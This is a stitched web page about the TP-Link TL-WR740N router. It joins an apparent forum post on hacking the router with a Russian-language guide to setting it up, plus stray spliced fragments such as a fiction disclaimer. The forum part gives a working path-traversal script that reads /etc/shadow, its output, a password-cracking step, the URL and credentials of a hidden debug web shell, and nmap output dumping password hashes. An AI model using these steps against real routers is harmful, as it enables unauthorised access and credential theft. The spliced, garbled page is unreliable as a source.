Press "Enter" to skip to content

Как настроить TP-Link TL-WR740N? Настройка Wi-Fi и интернета

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

Mikroproqram TP-Link TL-WR740N

The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.

Author
Message
Ligeti
Senior Member
Nine Years of Service
Threads: 17
Reputation: 0
Hacking into TP-Link (TL-WR740N) 06-19-2014, 01:19 AM #1

Hello
(dedicated to @ chmod )

Yes it’s me again!

Ok, this is a story and not a tutorial or a project. also this is not a 0-day, I just found out that it is a very known vulnerability in TP-Link routers, but the implementation is what I want to show you + the story.

Lately I was hacking/pentesting routers (TP-Link, ZTE and BandLuxe), and I found lots of interesting stuff that I will post all in the forum as soon as possible, but to start with here is one!

I have a TL-WR740N router (it is an old one), that I was trying to gain access to its firmware which I think it is OpenWRT, but nmap reports that it is TP-Link WAP. so idk! I scanned the ports hoping to find an open Telnet or SSH port (ZTE router has TELNET port opened by the way. ) but they are not, here is my primary scan:

ligeti-Studio-1558 ~ # nmap -sT 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0028s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

SO . I went to test the graphical inteface (web interface of the router on http://192.168.0.1/), here how the page looks like:

A little about the interface, I checked the source code and found out that the webpage uses tags to load the site content.

Here is the source code:

  • I made a list of the available directories/paths:
    • root, http://192.168.0.1/ which is represented by ‘/’
    • frames, http://192.168.0.1/frames/
    • images, http://192.168.0.1/images/
    • help, http://192.168.0.1/help/
    • userRpm (whatever that is), http://192.168.0.1/userRpm/

    import urllib
    import time

    #How many directories do we want to go back (depth of the test)
    depth = 10

    host = ‘http://192.168.0.1/’
    path = ‘../’
    target = ‘etc/shadow’

    htmltext = ”
    fullpath = ”
    limit = 0

    # List of directories I want to test
    directories = [”, ‘frames/’, ‘images/’,’help/’]

    for i in range(1,depth):
    fullpath += path
    for directory in directories:
    url = host + directory + fullpath + target
    print “Testing: “, url
    try:
    htmltext = urllib.urlopen(url).read()
    except:
    pass
    if (“root” in htmltext):
    print url, ” is vulnerable”
    else:
    time.sleep(2)
    continue

    The program (more precisely urllib) will prompt for user/password, the default username and password for TL-W740N router is admin/admin (if not I could just use hydra or medusa to crack the password!)

    Testing: http://192.168.0.1/../etc/shadow
    Testing: http://192.168.0.1/frames/../etc/shadow
    Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin
    Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1:
    Testing: http://192.168.0.1/images/../etc/shadow
    Testing: http://192.168.0.1/help/../etc/shadow
    Testing: http://192.168.0.1/../../etc/shadow
    Testing: http://192.168.0.1/frames/../../etc/shadow
    http://192.168.0.1/frames/../../etc/shadow is vulnerable
    Testing: http://192.168.0.1/images/../../etc/shadow
    http://192.168.0.1/images/../../etc/shadow is vulnerable
    Testing: http://192.168.0.1/help/../../etc/shadow
    http://192.168.0.1/help/../../etc/shadow is vulnerable

    So . if you run this scrit with -i option (pyhon -i ) you will end in the interactive mode (good for debugging), so I checked the value of htmltext and what do you know

    Not bad so far! So now what?

    I copied the line that has root account in it to a file and named it root.password, and using john:

    john –show root.password

    I got the password, it is 5up (default password I guess)

    Anyway. now what? (this is interesting)

    Well. I did my research, and this is what I found:

    TP-Link routers has a hidden web shell, that you can access using this url:
    http://192.168.0.1/userRpmNatDebugRpm265. dline.html

    The user name is osteam, and the password is 5up, here how this interface looks like:

    And there is a nmap script actually to test this vulnerability in TP-Link routers

    nmap -p80 –script http-tplink-dir-traversal -Pn -n 192.168.0.1

    Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST
    Nmap scan report for 192.168.0.1
    Host is up (0.00016s latency).
    PORT STATE SERVICE
    80/tcp open http
    | http-tplink-dir-traversal:
    | VULNERABLE:
    | Path traversal vulnerability in several TP-Link wireless routers
    | State: VULNERABLE (Exploitable)
    | Description:
    | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
    | This vulnerability can be exploited without authenticatication.
    | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
    | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
    | Disclosure date: 2012-06-18
    | Extra information:
    | /etc/shadow :
    |
    | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7.
    | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7.
    | bin::10933:0:99999:7.
    | daemon::10933:0:99999:7.
    | adm::10933:0:99999:7.
    | lp:*:10933:0:99999:7.
    | sync:*:10933:0:99999:7.
    | shutdown:*:10933:0:99999:7.
    | halt:*:10933:0:99999:7.
    | uucp:*:10933:0:99999:7.
    | operator:*:10933:0:99999:7.
    | nobody::10933:0:99999:7.
    | ap71::10933:0:99999:7.
    |
    | References:
    |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
    MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

    Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

    By the way. I mirrored the website using webhttrack (httrack) but I didn’t get anythig interesting. but when using the web shell, I went to the web directory and there is a folder names “userRpm” and there I found lots of interesting files, I am still digging into this router (I want to see if I can upload a file or add new commands maybe!)

    TL-WR740N routers are common here where I live (and in Mexico as well), and they are not secured . in fact you should be careful with the router you are using and double check and test it for security.

    [note]: this is VERY interesting video about hacking routers (I applied that method on ZTE router and got great results)

    Как настроить TP-Link TL-WR740N? Настройка Wi-Fi и интернета

    В этой инструкции мы с вами будем настраивать роутер TP-Link TL-WR740N. Это очень популярный маршрутизатор, который пользуется большим спросом из-за небольшой цены и качества. У многих моих знакомых установлен именно TP-Link TL-WR740N, который отлично справляется со своей задачей. А создан он исключительно для домашнего использования. И то, если у вас дома много устройств, и сам дом большой, то TL-WR740N может не справится со своей работой. Это нормально, ведь это бюджетный маршрутизатор.

    Но, даже несмотря на его небольшую цену, выглядит он просто отлично. Красивый дизайн, матовый корпус, есть возможность повесить роутер на стену, все это несомненно плюсы. Конечно же хотелось бы еще увидеть кнопку включения/отключения питания, и отдельную кнопку для отключения Wi-Fi, но их к сожалению нет. Единственная проблема, это когда при подключении большого количества устройств, в онлайн играх, при загрузке торрентов, может пропадать интернет. И роутер придется частенько перезагружать. Писал об этом здесь. Но это вполне нормально для бюджетной модели.

    Выпускается эта модель очень давно, уже есть 6 аппаратных версий, а это значит, что уже шесть раз его дорабатывали и что-то обновляли (в плане железа) . Этот маршрутизатор получил очень много наград и выиграл много конкурсов. По настоящему народная модель.

    Сейчас я покажу как настроить TP-Link TL-WR740N. Это будет полная инструкция по настройке интернета, Wi-Fi сети, и установке пароля на беспроводную сеть. Ну и рассмотрим процесс подключения роутера. Не важно, новый у вас маршрутизатор только что с магазина, или им уже пользовались, инструкция для вас подойдет. Впрочем, эта инструкция подойдет и для Tp-Link TL-WR741ND.

    Если роутер уже пробовали настроить, то неплохо бы сделать сброс настроек TP-Link TL-WR740N. Для этого включите питание, и на 10 секунд зажмите кнопку WPS/RESET, которая находится на задней стороне роутера.

    Можете смотреть на индикаторы, они должны все загореться. После этого можно отпускать кнопку.

    Подключаем роутер TP-Link TL-WR740N

    Берем адаптер питания, и подключаем к роутеру. Подключаем его к электросети. Дальше, в WAN разъем (он синий) на роутере подключаем интернет. Сетевой кабель от интернет-провайдера. А если у вас интернет через ADSL модем, то соединяем TP-Link TL-WR740N с модемом. На роутере кабель в WAN разъем, а на модеме в LAN.

    Теперь вам нужно определится, с какого устройства вы будете настраивать роутер. Если с компьютера, или ноутбука, то я советую подключится к роутеру по кабелю, который идет в комплекте. Подключаем кабель в LAN разъем (желтый) , а на компьютере в разъем сетевой карты.

    А если вы хотите настраивать свой TL-WR740N по Wi-Fi, то просто подключитесь к его Wi-Fi сети. Если роутер новый, то она будет иметь стандартное название. Например, у меня такое: “TP-LINK_9C00”. А для подключения используйте стандартный пароль, который указан снизу роутера на наклейке.

    Просто подключитесь к беспроводной сети. Если будет статус “без доступа к интернету”, то это нормально. Это значит, что нужно просто настроить подключение к провайдеру. Чем мы сейчас и займемся.

    TL-WR740N: настройка подключения к интернету (WAN)

    Если хотите, то перед настройкой можете обновить прошивку роутера. У нас для этой модели есть отдельная инструкция: Прошивка роутера Tp-link TL-WR741ND и Tp-link TL-WR740N

    1. Если для подключения к интернету нужно было запускать высокоскоростное подключение, то теперь оно не нужно. Его можно удалить. Это подключение будет устанавливать роутер, после настройки.

    2. Если у вас на компьютере уже интернет работает через роутер, без запуска разных подключений, то скорее всего у вас провайдер использует технологию соединения Динамический IP, и вам не нужно настраивать подключение к интернету. Можете сразу переходить к настройке Wi-Fi сети (смотрите ниже) .

    Нам нужно зайти в панель управления.

    Вход в настройки роутера TP-Link TL-WR740N

    Если вы уже подключены к маршрутизатору, то просто откройте любой браузер, в адресной строке введите адрес 192.168.0.1 (на более старых версиях может быть 192.168.1.1) , или http://tplinkwifi.net, и перейдите по нему. Введите имя пользователя и пароль. Если вы их не меняли, то это admin и admin. Ну а если меняли и забыли, то сделаем сброс настроек.

    Возможно вам еще пригодится более подробная статья по входу в панель управлении Tp-Link, и совет по решению проблемы, когда не получается зайти в настройки.

    Настройки у меня на русском языке. Думаю, у вас тоже. Если же у вас все на английском, и нет русской прошивки на сайте Tp-Link, то напишите в комментариях, добавлю названия разделов меню на английском.

    Настройка PPPoE, L2TP, PPTP

    Вы обязательно должны знать какой тип подключения использует ваш интернет-провайдер. И все необходимые данные для подключения: имя пользователя, пароль, IP (если нужно) . Эту информацию можно уточнить у самого провайдера, или в документах, который вы получили при подключении.

    Перейдите в настройках на вкладку СетьWAN. В меню Тип подключения WAN нам нужно выбрать тип подключения.

    Если у вас Динамический IP, то выбираем его и сразу нажимаем на кнопку Сохранить. Там больше никаких параметров задавать не нужно. Разве что, если ваш провайдер делает привязку по MAC адресу (но это редко бывает) . После этого интернет через маршрутизатор должен заработать.

    А если у вас PPPoE, PPTP, или L2TP, то нужно будет задать необходимые параметры для подключения, которые выдал провайдер.

    Если таким способом у вас не получилось настроить интернет, то перейдите на вкладку Быстрая настройка, и попробуйте настроить все с помощью пошаговой инструкции. Там можно просто выбрать страну, провайдера, и т. д. Возможно, так вам будет легче.

    К настройке Wi-Fi переходите только тогда, когда интернет через роутер уже будет работать.

    Настройка Wi-Fi и пароля на TP-Link TL-WR740N

    Переходим к настройке беспроводной сети и установке пароля на Wi-Fi. В панели управления откройте вкладку Беспроводной режим.

    Здесь нам нужно сменить название Wi-Fi сети, выбрать наш регион, и нажать на кнопку Сохранить.

    Для установки пароля переходим сразу на вкладку Беспроводной режимЗащита беспроводного режима.

    Здесь нужно выделить пункт WPA/WPA2 – Personal (рекомендуется), выставить остальные параметры как у меня на скриншоте ниже, и в поле Пароль беспроводной сети придумать и записать пароль, которым будет защищен ваш Wi-Fi. Пароль должен быть минимум из 8 символов. Нажмите на кнопку Сохранить, и можете сразу нажать на ссылку “Нажмите здесь”, что бы перезагрузить роутер.

    После перезагрузки нужно будет заново подключить устройства, которые вы подключали по Wi-Fi. Уже с новым паролем, и к сети с новым названием, если вы его сменили.

    Смена пароля admin для входа в настройки

    Советую еще зайти в настройки, и на вкладке СистемаПароль сменить пароль который используется для входа в настройки роутера со стандартного admin на какой-то более сложный. Для этого нужно будет указать старое имя пользователя и старый пароль, и задать новые. Имя пользователя можете оставить admin, а вот пароль придумайте другой.

    Запишите пароль, что бы не забыть его. А если забудете, то нужно будет сбрасывать настройки к заводским, и настраивать все заново, так как не сможете попасть в панель управления.

    Настроить TP-Link TL-WR740N самому совсем не сложно. Точно не сложнее чем другие модели этого производителя. Главное, что бы интернет заработал через роутер, и на компьютере пропал статус “Без доступа к интернету”, о котором я писал в этой статье.

    Настраивать можно как с компьютера (не важно, Windows 10 у вас, Windows 7, или другая ОС) , так и с мобильного устройства (смартфона, планшета) . А если у вас TL-WR740N аппаратной версии 5 и выше, то для настройки и управления роутером можно использовать фирменную программу TP-LINK Tether. Все работает, проверял.

    Если у вас остались какие-то вопросы по настройке этого маршрутизатора, то задавайте их в комментариях.

Comments are closed, but trackbacks and pingbacks are open.